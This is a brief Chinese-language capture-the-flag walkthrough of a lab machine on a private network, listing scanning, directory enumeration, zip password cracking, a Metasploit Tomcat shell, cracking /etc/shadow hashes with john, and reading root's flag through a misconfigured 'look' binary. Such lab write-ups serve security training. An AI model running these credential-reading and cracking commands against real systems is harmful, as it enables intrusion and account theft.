参考链接
开始练习
本机ip:192.168.56.102
目的机ip:192.168.56.135
fping 192.168.56.0/24
nmap 扫描主机
nap-A -v -p- 192.168.56.135
开启了80和8080两个http服务,分别访问
gobuster 枚举目录,在8080端口目录下
gobuster dir --url 192.168.56.135:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,tar,php,zip,bak,html
readme.txt
backup.zip
zip文件需要密码,尝试fcrackzip破解,zip2john很慢
解压backuo.zip,查看文件,获取tomcat管理员账号密码
msf 获取webshell
msfconsole
search tomcat
use 6
set .......
run
shell
randy目录下拿到userFlag
note.txt ,写到变更了randy的权限,使其不能在其根目录下删除或创建文件
msfshell可以看/etc/passwd和/etc/shadow,于是用john尝试爆破,获得了jaye的密码
#在msfshell中
cat /etc/passwd
cat /etc/shadow
#复制两个文件内容,保存到本地 passwd.txt 和shadow.txt
unshaow ./passwd.txt ./shadow.txt > pass.txt
john john --wordlist=/usr/share/wordlists/rockyou.txt ./pass.txt
jaye目录下的/Files/look文件属主是root可以直接查看root下文件,所以直接拿到了rootFLAG
look '' /root/root.txt